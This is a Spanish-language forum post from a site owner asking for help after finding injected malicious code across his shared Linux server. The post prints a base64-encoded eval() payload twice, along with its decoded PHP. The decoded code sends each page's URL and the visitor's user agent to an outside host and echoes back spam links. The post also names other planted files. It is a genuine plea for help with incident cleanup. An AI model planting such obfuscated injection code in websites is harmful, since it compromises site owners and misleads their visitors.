Foros del Web » Soporte técnico » Virus, troyanos y spyware »

Se inyecto codigo malicioso en mi servidor (php,js)

Estas en el tema de Se inyecto codigo malicioso en mi servidor (php,js) en el foro de Virus, troyanos y spyware en Foros del Web. Buenas, tengo un problema muy grave en mi servidor, hace poco revisando uno de mis websites me salió este error: Fatal error: Cannot redeclare file_get_contents_curl() ...
  #1 (permalink)  
Antiguo 13/06/2013, 04:12
 
Fecha de Ingreso: diciembre-2011
Mensajes: 9
Antigüedad: 12 años, 11 meses
Puntos: 0
Exclamación Se inyecto codigo malicioso en mi servidor (php,js)

Buenas, tengo un problema muy grave en mi servidor, hace poco revisando uno de mis websites me salió este error:

Fatal error: Cannot redeclare file_get_contents_curl() (previously declared in /home/zeus/public_html/website.com/index.php(1) : eval()'d code:2) in /home/zeus/public_html/website.com/index.php(2) : eval()'d code on line 11

Entonces al entrar al index.php encontré estas 2 lineas al principio

<?php eval(base64_decode('CmZ1bmN0aW9uIGZpbGVfZ2V0X2Nvbn RlbnRzX2N1cmwoJHVybCkgewoJJGNoID0gY3VybF9pbml0KCk7 CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfSEVBREVSLCAwKT sKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFO U0ZFUiwgMSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVV JMLCAkdXJsKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9V U0VSQUdFTlQsICJMT0NBTFNBUEUiKTsKCSRkYXRhID0gY3VybF 9leGVjKCRjaCk7CgljdXJsX2Nsb3NlKCRjaCk7CglyZXR1cm4g JGRhdGE7Cn0KJGxpbmtzID0gZmlsZV9nZXRfY29udGVudHNfY3 VybCgiaHR0cDovL2t5a2xhbS5iZ2V0LnJ1L2dldGxpbmtzLnBo cD9hcGljb2RlPVIzM3llZjk0M2pGJnBhZ2V1cmw9Ii51cmxlbm NvZGUoImh0dHA6Ly8iLiRfU0VSVkVSWyJTRVJWRVJfTkFNRSJd LiRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdKS4iJnVzZXJhZ2VudD 0iLnVybGVuY29kZSgkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5U Il0pLiIiKTsKZWNobyAkbGlua3M7Cg==')); ?>
<?php eval(base64_decode('CmZ1bmN0aW9uIGZpbGVfZ2V0X2Nvbn RlbnRzX2N1cmwoJHVybCkgewoJJGNoID0gY3VybF9pbml0KCk7 CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfSEVBREVSLCAwKT sKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFO U0ZFUiwgMSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVV JMLCAkdXJsKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9V U0VSQUdFTlQsICJMT0NBTFNBUEUiKTsKCSRkYXRhID0gY3VybF 9leGVjKCRjaCk7CgljdXJsX2Nsb3NlKCRjaCk7CglyZXR1cm4g JGRhdGE7Cn0KJGxpbmtzID0gZmlsZV9nZXRfY29udGVudHNfY3 VybCgiaHR0cDovL2t5a2xhbS5iZ2V0LnJ1L2dldGxpbmtzLnBo cD9hcGljb2RlPVIzM3llZjk0M2pGJnBhZ2V1cmw9Ii51cmxlbm NvZGUoImh0dHA6Ly8iLiRfU0VSVkVSWyJTRVJWRVJfTkFNRSJd LiRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdKS4iJnVzZXJhZ2VudD 0iLnVybGVuY29kZSgkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5U Il0pLiIiKTsKZWNobyAkbGlua3M7Cg==')); ?>

Las cuáles nunca había visto, al parecer fueron inyectadas. Al decodear el base64 me generó esto:

function file_get_contents_curl($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, "LOCALSAPE");
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
$links = file_get_contents_curl("http://kyklam.bget.ru/getlinks.php?apicode=R33yef943jF&pageurl=".urlenco de("http://".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"])."&useragent=".urlencode($_SERVER["HTTP_USER_AGENT"])."");
echo $links;

Por otro lado, he encontrado que la mayoria de los index.php que tengo en mi servidor están infectados con el mismo código malicioso, asimismo también he encontrado archivos sys.php, .htaccess, class.smtp, hunt.php que han inyectado en diferentes carpetas de mi servidor. Estoy eliminando uno por uno según lo que voy encontrando por fecha de modificación y error_log pero no sé si llegaré a solucionar el problema solo borrando lo que encuentre. Alguien sabe como es que me ocurrió todo esto y que efectos secundarios pueden estar causándome ? Hay alguna manera de limpiar todo ? Cómo puedo evitar que se siga esparciendo y empeoren las cosas ? Que medidas de seguridad me recomiendan a seguir ?
Actualmente mi servidor es un servidor linux compartido.

Muchas gracias por la ayuda.

Etiquetas: php, servidor
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 11:36.